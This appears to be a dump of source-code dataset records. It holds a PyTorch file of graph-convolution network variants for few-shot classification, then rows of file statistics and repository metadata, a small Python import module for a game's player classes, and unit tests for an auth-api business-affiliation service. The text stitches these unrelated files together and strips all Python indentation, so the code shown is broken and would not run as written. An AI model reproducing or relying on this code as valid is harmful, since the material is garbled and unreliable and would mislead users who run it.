class MGCN(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
# A = self.MultiAdjacencyCompute(features)
# #x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
A = self.MultiAdjacencyCompute(features)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None, largest=True)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency0_T = adjacency0.t()
adjacency0 = torch.mul(adjacency0, adjacency0_T)
adjacency0_sum1 = torch.sum(adjacency0,dim=0)
adjacency0_sum2 = torch.sum(adjacency0,dim=1)
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
data = 0.5
aifa = F.softmax(torch.cat([self.aifa1,self.aifa2,self.aifa3],dim=0),dim=0)
adjacency = aifa[0]*torch.eye(N).cuda() + aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
adjacency0_sum1 = torch.sum(adjacency,dim=0)
adjacency0_sum2 = torch.sum(adjacency,dim=1)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
#改进四:多图GCN A+A^2最终版本
class MultiGCN_temp(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
# A = self.MultiAdjacencyCompute(features)
# #x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
A = self.MultiAdjacencyCompute(features)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None, largest=True)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
data = 0.5
aifa = F.softmax(torch.cat([self.aifa1,self.aifa2,self.aifa3],dim=0),dim=0)
adjacency = aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
#改进四:多图GCN A+A^2最终版本
class MultiGCN_temp2(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
# A = self.MultiAdjacencyCompute(features)
# #x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
A = self.MultiAdjacencyCompute(features)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None, largest=True)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
data = 0.5
aifa = F.softmax(torch.cat([self.aifa1,self.aifa2,self.aifa3],dim=0),dim=0)
adjacency = torch.eye(N).cuda()
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
#改进四:ProtoGCN最终版本
class ProtoGCN(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
A = self.MultiAdjacencyCompute(features)
#x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
#
# A = self.MultiAdjacencyCompute(x)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / self.test_N_way), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacency = torch.mm(torch.mm(inv_D, adjacency),inv_D)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
#改进四:ProtoIGCN最终版本
class ProtoIGCN(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
# self.bn3 = nn.BatchNorm1d(input_dim)
# self.bn4 = nn.BatchNorm1d(1600)
self.gcn = GraphConvolution(input_dim, 1000)
# self.sigama1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
# self.sigama2 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
A = self.MultiAdjacencyCompute(features)
#x = self.bn1(torch.mm(A,features))
x = self.bn1(torch.mm(A,features))
x = F.relu(x)
A = self.MultiAdjacencyCompute(x)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, x)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacency = torch.mm(torch.mm(inv_D, adjacency),inv_D)
adjacency = torch.mm(adjacency,adjacency)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
#改进四:ProtoGCN最终版本
class GNN(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gnn = Graphprogate(input_dim, 1000)
self.test_N_way = N_way
def forward(self,features):
A = self.MultiAdjacencyCompute(features)
#x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
#
# A = self.MultiAdjacencyCompute(x)
# x = self.bn2(torch.mm(A,x))
x = self.gnn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / self.test_N_way), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacency = torch.mm(torch.mm(inv_D, adjacency),inv_D)
return adjacency
class RelationNetwork(nn.Module):
"""Graph Construction Module"""
def __init__(self):
super(RelationNetwork, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, padding=1))
self.layer2 = nn.Sequential(
nn.Conv2d(64, 1, kernel_size=3, padding=1),
nn.BatchNorm2d(1),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, padding=1))
self.fc3 = nn.Linear(2 * 2, 8)
self.fc4 = nn.Linear(8, 1)
self.m0 = nn.MaxPool2d(2) # max-pool without padding
self.m1 = nn.MaxPool2d(2, padding=1) # max-pool with padding
def forward(self, x):
x = x.view(-1, 64, 5, 5)
out = self.layer1(x)
out = self.layer2(out)
# flatten
out = out.view(out.size(0), -1)
out = F.relu(self.fc3(out))
out = self.fc4(out) # no relu
out = out.view(out.size(0), -1) # bs*1
return out
#改进四:多图GCN A+A^2最终版本, sigma is trained
eps = np.finfo(float).eps
class MultiGCN_sigma(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.sigma = 3
self.relation = RelationNetwork()
self.reset_parameters_kaiming()
def forward(self,features):
# A = self.MultiAdjacencyCompute(features)
# #x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
A = self.MultiAdjacencyCompute(features)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
self.sigma = self.relation(features)
emb_all = features / (self.sigma + eps) # N*d
emb1 = torch.unsqueeze(emb_all, 1) # N*1*d
emb2 = torch.unsqueeze(emb_all, 0) # 1*N*d
W = ((emb1 - emb2) ** 2).mean(2) # N*N*d -> N*N
adjacency_e = torch.exp(-W / 2)
#temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
#sigma_2 = (self.sigma + eps)*(self.sigma + eps)
#adjacency_e = torch.exp(-temp.pow(2) / sigma_2).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
data = 0.5
aifa = F.softmax(torch.cat([self.aifa1,self.aifa2,self.aifa3]))
adjacency = aifa[0]*torch.eye(N).cuda() + aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
#改进四:多图GCN A+A^2最终版本,add with label progation
class MultiGCN_progation(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.alpha = nn.Parameter(torch.tensor(0.5).cuda(0), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features, s_label):
# A = self.MultiAdjacencyCompute(features)
# #x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
A = self.MultiAdjacencyCompute(features)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
# x = F.relu(self.bn2(x))
# x = F.dropout(x, 0.6, training=self.training)
# Step3: Label Propagation, F = (I-\alpha S)^{-1}Y
A = self.AdjacencyCompute(x)
pred_label = self.progation_label(x,s_label)
return pred_label
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
data = 0.5
aifa = F.softmax(torch.cat([self.aifa1,self.aifa2,self.aifa3]))
adjacency = aifa[0]*torch.eye(N).cuda() + aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def AdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 30).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
return adjacency
def progation_label(self, features, s_labels):
eps = np.finfo(float).eps
num_classes = len(np.unique(s_labels.cpu()))
num_support = int(s_labels.shape[0] / num_classes)
len_query = features.shape[0] - s_labels.shape[0]
s_labels = s_labels.unsqueeze(dim=1)
temp_labels = torch.zeros(num_support*num_classes,num_classes).cuda()
s_labels = temp_labels.scatter_(1,s_labels,1)
S = self.AdjacencyCompute(features)
ys = s_labels
yu = torch.zeros(len_query, num_classes).cuda(0)
# yu = (torch.ones(num_classes*num_queries, num_classes)/num_classes).cuda(0)
y = torch.cat((ys, yu), 0)
N = S.shape[0]
F_all = torch.matmul(torch.inverse(torch.eye(N).cuda(0) - self.alpha * S + eps), y)
Fq = F_all[num_classes * num_support:, :] # query predictions
return F_all, Fq
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
if __name__=='__main__':
model = GNN(input_dim=10, N_way=10).cuda()
model_MGNN = MultiGCN(input_dim=10, N_way=10).cuda()
feature = torch.randn(200,1600).cuda()
feature1 = model(feature)
feature2 = model_MGNN(feature)
print('# generator parameters:', sum(param.numel() for param in model.parameters()))
print('# discriminator parameters:', sum(param.numel() for param in model_MGNN.parameters()))
| 34.501779 | 120 | 0.597524 | 4,022 | 29,085 | 4.18175 | 0.056688 | 0.039836 | 0.030323 | 0.035317 | 0.873417 | 0.859445 | 0.856353 | 0.842381 | 0.837862 | 0.826565 | 0 | 0.031712 | 0.262747 | 29,085 | 842 | 121 | 34.542755 | 0.752647 | 0.102802 | 0 | 0.813743 | 0 | 0 | 0.005482 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088608 | false | 0 | 0.012658 | 0 | 0.169982 | 0.003617 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c189ff6626d0785023d1f3e89520ff9f222f2f2e | 153 | py | Python | src/player/__init__.py | ProfessorQu/Risky-Robots | 31f2d3a7755113a010f2092ef02dc3b5980a665f | [
"MIT"
] | null | null | null | src/player/__init__.py | ProfessorQu/Risky-Robots | 31f2d3a7755113a010f2092ef02dc3b5980a665f | [
"MIT"
] | null | null | null | src/player/__init__.py | ProfessorQu/Risky-Robots | 31f2d3a7755113a010f2092ef02dc3b5980a665f | [
"MIT"
] | null | null | null | from src.player.healthbar import HealthBar
from src.player.player import Player
from src.player.inputs import Inputs
from src.player.weapon import Weapon | 38.25 | 42 | 0.849673 | 24 | 153 | 5.416667 | 0.291667 | 0.215385 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098039 | 153 | 4 | 43 | 38.25 | 0.942029 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c18a8d756b4a29a36e331c4e28536630f4fc9543 | 14,139 | py | Python | auth-api/tests/unit/services/test_affiliation.py | jeznorth/sbc-auth | 12e2a308a6035629e6cc285980497b69b44a5a5d | [
"Apache-2.0"
] | null | null | null | auth-api/tests/unit/services/test_affiliation.py | jeznorth/sbc-auth | 12e2a308a6035629e6cc285980497b69b44a5a5d | [
"Apache-2.0"
] | null | null | null | auth-api/tests/unit/services/test_affiliation.py | jeznorth/sbc-auth | 12e2a308a6035629e6cc285980497b69b44a5a5d | [
"Apache-2.0"
] | null | null | null | # Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Affiliation service.
Test suite to ensure that the Affiliation service routines are working as expected.
"""
from unittest.mock import patch
import pytest
from auth_api.exceptions import BusinessException
from auth_api.exceptions.errors import Error
from auth_api.models.affiliation import Affiliation as AffiliationModel
from auth_api.models.org import Org as OrgModel
from auth_api.services import Affiliation as AffiliationService
from tests.utilities.factory_scenarios import TestEntityInfo, TestOrgTypeInfo
from tests.utilities.factory_utils import factory_entity_service, factory_org_service
def test_create_affiliation(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can be created."""
entity_service = factory_entity_service(entity_info=TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
affiliation = AffiliationService.create_affiliation(org_id, business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
assert affiliation
assert affiliation.entity.identifier == entity_service.identifier
assert affiliation.as_dict()['org']['id'] == org_dictionary['id']
def test_create_affiliation_no_org(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be created without org."""
entity_service = factory_entity_service()
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
with pytest.raises(BusinessException) as exception:
AffiliationService.create_affiliation(None, business_identifier, {})
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_create_affiliation_no_entity(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be created without entity."""
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
with pytest.raises(BusinessException) as exception:
AffiliationService.create_affiliation(org_id, None, {})
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_create_affiliation_implicit(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be created when org is IMPLICIT."""
entity_service1 = factory_entity_service()
entity_dictionary1 = entity_service1.as_dict()
business_identifier1 = entity_dictionary1['businessIdentifier']
org_service = factory_org_service(org_type_info=TestOrgTypeInfo.implicit)
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
pass_code = '111111111'
with pytest.raises(BusinessException) as exception:
AffiliationService.create_affiliation(org_id, business_identifier1, pass_code, {})
found_org = OrgModel.query.filter_by(id=org_id).first()
assert found_org is None
assert exception.value.code == Error.INVALID_USER_CREDENTIALS.name
def test_create_affiliation_with_passcode(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can be created."""
entity_service = factory_entity_service(entity_info=TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
affiliation = AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
assert affiliation
assert affiliation.entity.identifier == entity_service.identifier
assert affiliation.as_dict()['org']['id'] == org_dictionary['id']
def test_create_affiliation_with_passcode_no_passcode_input(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be created with a passcode entity and no passcode input parameter."""
entity_service = factory_entity_service(entity_info=TestEntityInfo.entity_passcode)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
with pytest.raises(BusinessException) as exception:
AffiliationService.create_affiliation(org_id, business_identifier)
assert exception.value.code == Error.INVALID_USER_CREDENTIALS.name
def test_create_affiliation_exists(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be created affiliation exists."""
entity_service1 = factory_entity_service(entity_info=TestEntityInfo.entity_lear_mock)
entity_dictionary1 = entity_service1.as_dict()
business_identifier1 = entity_dictionary1['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
pass_code = TestEntityInfo.entity_lear_mock['passCode']
# create first row in affiliation table
AffiliationService.create_affiliation(org_id, business_identifier1, pass_code, {})
with pytest.raises(BusinessException) as exception:
AffiliationService.create_affiliation(org_id, business_identifier1, pass_code, {})
assert exception.value.code == Error.INVALID_USER_CREDENTIALS.name
def test_find_affiliated_entities_by_org_id(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can be created."""
entity_service1 = factory_entity_service(entity_info=TestEntityInfo.entity_lear_mock)
entity_dictionary1 = entity_service1.as_dict()
business_identifier1 = entity_dictionary1['businessIdentifier']
entity_service2 = factory_entity_service(entity_info=TestEntityInfo.entity_lear_mock2)
entity_dictionary2 = entity_service2.as_dict()
business_identifier2 = entity_dictionary2['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
# create first row in affiliation table
AffiliationService.create_affiliation(org_id,
business_identifier1,
TestEntityInfo.entity_lear_mock['passCode'],
{})
# create second row in affiliation table
AffiliationService.create_affiliation(org_id,
business_identifier2,
TestEntityInfo.entity_lear_mock2['passCode'],
{})
affiliated_entities = AffiliationService.find_affiliated_entities_by_org_id(org_id)
assert affiliated_entities
assert len(affiliated_entities) == 2
assert affiliated_entities[0]['businessIdentifier'] == entity_dictionary1['businessIdentifier']
def test_find_affiliated_entities_by_org_id_no_org(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be find without org id or org id not exists."""
with pytest.raises(BusinessException) as exception:
AffiliationService.find_affiliated_entities_by_org_id(None)
assert exception.value.code == Error.DATA_NOT_FOUND.name
with pytest.raises(BusinessException) as exception:
AffiliationService.find_affiliated_entities_by_org_id(999999)
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_find_affiliated_entities_by_org_id_no_affiliation(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be find without affiliation."""
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
with patch.object(AffiliationModel, 'find_affiliations_by_org_id', return_value=None):
with pytest.raises(BusinessException) as exception:
AffiliationService.find_affiliated_entities_by_org_id(org_id)
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_delete_affiliation(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an affiliation can be deleted."""
entity_service = factory_entity_service(TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
affiliation = AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
AffiliationService.delete_affiliation(org_id=org_id, business_identifier=business_identifier)
found_affiliation = AffiliationModel.query.filter_by(id=affiliation.identifier).first()
assert found_affiliation is None
